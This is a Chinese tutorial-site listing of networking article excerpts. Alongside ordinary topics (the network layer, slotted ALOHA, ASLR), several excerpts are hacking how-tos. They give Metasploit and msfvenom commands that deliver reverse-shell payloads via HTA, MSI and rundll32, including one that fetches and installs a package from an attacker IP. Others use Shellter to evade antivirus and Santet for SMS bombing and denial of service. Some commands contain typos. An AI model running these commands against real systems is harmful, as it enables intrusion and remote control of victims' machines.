找到关于计算机网络的1600 篇文章

计算机网络层

Moumita
更新于 2020-11-28 08:11:02

757 次浏览

网络层或 OSI(开放系统互连)模型的第 3 层负责跨多个跳点或节点的数据包从源主机到目标主机的传递。它控制子网的操作。网络层在 OSI 模型中的位置如下图所示:网络层的函数网络层负责将数据包从源主机路由到目标主机。路由可以基于很少更改的静态表;或者它们可以根据网络状况自动更新。许多网络被划分为子网络或子网……阅读更多

使用 Docker 进行渗透测试

Ajay yadav
更新于 2020-09-23 12:38:05

275 次浏览

您将学习如何通过简单的步骤使用 docker 配置易受攻击的 Web 应用程序 (DVWA)。Docker 是一个第三方工具,用于创建隔离的环境来执行任何应用程序。这些应用程序使用容器运行。这些容器之所以独特,是因为它们将应用程序的所有依赖项整合到一个包中并进行部署。使用以下命令安装和配置它:apt update apt install docker.io systemctl start docker systemctl enable docker 在 Docker 上配置 DVWA Damn Vulnerable Web Application (DVWA) 是一个极其容易受到攻击的 PHP/MySQL Web 应用程序。其主要目标是作为一种辅助工具……阅读更多

TheZoo 存储库实时恶意软件分析

Ajay yadav
更新于 2020-09-23 12:33:30

1K+ 次浏览

theZoo 允许研究恶意软件,并使对恶意软件分析感兴趣的人能够访问实时恶意软件,分析其操作方式,甚至使高级和精通技术的人能够在其自身环境中阻止特定恶意软件。git clone https://github.com/ytisf/theZoo cd theZoo pip install --user -r requirements.txt python theZoo.py 我建议在没有互联网连接(或者如果您必须使用内部虚拟网络)且没有来宾添加或任何等效项的虚拟机中运行它们。其中一些是蠕虫,会自动尝试传播。不受限制地运行它们意味着您将感染自己或其他人……阅读更多

使用 HTA 文件 (MSHTA.exe) 进行黑客攻击

Ajay yadav
更新于 2020-09-23 12:31:54

2K+ 次浏览

负责运行我们可以使用 JavaScript 或 VBScript 运行的 HTA(HTML 应用程序)文件的 Windows OS 实用程序。您可以使用 Microsoft MSHTA.exe 工具解释这些文件。Metasploit 包含“HTA Web 服务器”模块,该模块生成恶意 hta 文件。此模块托管一个 HTML 应用程序 (HTA),当打开时将通过 Powershell 运行有效负载。恶意 HTA 文件在 Kali linux 中打开 metasploit 并使用以下命令生成恶意 HTA 文件:use exploit/windows/misc/hta_server set srvhost 192.168.1.109 set lhost 192.168.1.109 exploit 现在通过受害者机器上的 mshta.exe 运行恶意代码以获取 meterpreter 会话。阅读更多

使用 Santet 进行黑客攻击

Ajay yadav
更新于 2020-09-23 12:30:05

912 次浏览

本文阐述了如何使用 Santet 工具进行黑客攻击,该工具在一个包中内置了几种不同的攻击。它允许您创建有效负载、劫持 Facebook 群组、执行短信轰炸和短信欺骗攻击,最后是拒绝服务攻击。按照以下说明学习如何安装 Santet 并进一步使用它。打开您的 Kali 机器,打开终端并键入 git clone https://github.com/Gameye98/santet-online 现在使用 cd 命令将当前目录更改为 santet - cd santet-online 现在通过执行此命令授予 santet.py 文件执行权限 - chmod -x santet.py,现在运行 python santet.py 如下所示:如果一切……阅读更多

使用 MSI 包获取反向 Shell

Ajay yadav
更新于 2020-09-23 12:27:26

2K+ 次浏览

Windows OS 预装了 Windows Installer 引擎,MSI 包使用该引擎安装应用程序。解释包并安装产品的可执行程序是 Msiexec.exe。通过 msfvenom 启动 msiexec 攻击让我们使用 Windows Meterpreter 有效负载生成 MSI 包文件 (1.msi),如下所示:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi 在目标端,当受害者使用以下实用程序在远程机器上执行 1.msi 文件时:msiexec /q /i http://192.168.1.109/1.msi 攻击者通过启动 multi/handler 作为侦听器来获取受害者机器的反向 shell。use exploit/multi/handler set pyaload windows/meterpreter/reverse_tcp set lhost 192.168.1.109 exploit阅读更多

使用 Shelter 绕过防病毒软件

Ajay yadav
更新于 2020-09-23 12:25:51

1K+ 次浏览

Shellter 是一款主动的 shellcode 插入工具。它有效地重新编码有效负载以绕过防病毒软件。Shellter 以防病毒软件无法检测到的方式嵌入 32 位 Windows 应用程序和 shellcode。安装您可以使用以下命令直接在 Kali 上安装 Shellter - apt-get install shellter apt-get install wine32 如何绕过使用 wine 应用程序打开 shelter,选择操作模式为“a”。选择一个可执行文件并将其复制到 Shellter 文件夹。需要执行此操作才能将 Shellter 与 .exe 文件绑定。在本例中,我们已将 putty.exe 文件复制到 Shellter 文件夹……阅读更多

Rundll32.exe 攻击

Ajay yadav
更新于 2020-09-23 12:23:33

565 次浏览

Rundll32.exe 与 Windows 操作系统相关联,允许您调用从 DLL 导出的函数(16 位或 32 位),并将其存储在正确的内存库中。通过 SMB 启动 Rundll32 攻击 Metasploit 包含“SMB 传输”模块,该模块生成恶意 dll 文件。此模块通过 SMB 服务器提供有效负载,并提供检索和执行生成的有效负载的命令。生成 DLL 有效负载 use exploit/windows/smb/smb_delivery msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109(攻击者 IP) msf exploit(windows/smb/smb_delivery) > exploit 现在,您使用 rundll32.exe 在受害者机器上执行此生成的恶意 dll 文件,您将在您的机器上获得反向连接。rundll32.exe \192.168.1.109\vabFG\test.dll, 0阅读更多

地址空间布局随机化 (ASLR)

Ajay yadav
更新于 2020-09-23 12:21:13

266 次浏览

几十年来,尽管苹果、谷歌和微软等大型公司努力消除内存损坏漏洞,但这类漏洞仍然困扰着软件。本文介绍了关于ASLR的一些基本事实,重点关注Windows的实现。除了介绍ASLR如何提高安全态势外,我们还旨在为防御者提供改进软件安全的建议,并为研究人员提供更多关于ASLR工作原理的见解以及对其局限性进行调查的想法。内存损坏漏洞发生在程序错误地将攻击者控制的数据写入预期内存区域之外或预期内存范围之外时。这可能会导致崩溃……阅读更多

时隙ALOHA

Moumita
更新于 2020年9月23日 09:07:16

18K+ 次浏览

ALOHA是一种用于通过共享网络通道传输数据的介质访问控制(MAC)协议。使用此协议,来自多个节点的多个数据流通过多点传输通道传输。ALOHA协议有两种类型——纯ALOHA和时隙ALOHA。时隙ALOHA由Robert于1972年引入,是对纯ALOHA的改进。在这里,时间被划分为称为时隙的离散间隔,对应于一个帧。工作原理:通信站约定时隙边界。每个站只能在每个时隙发送一个帧。此外,站不能在任何时间……阅读更多

广告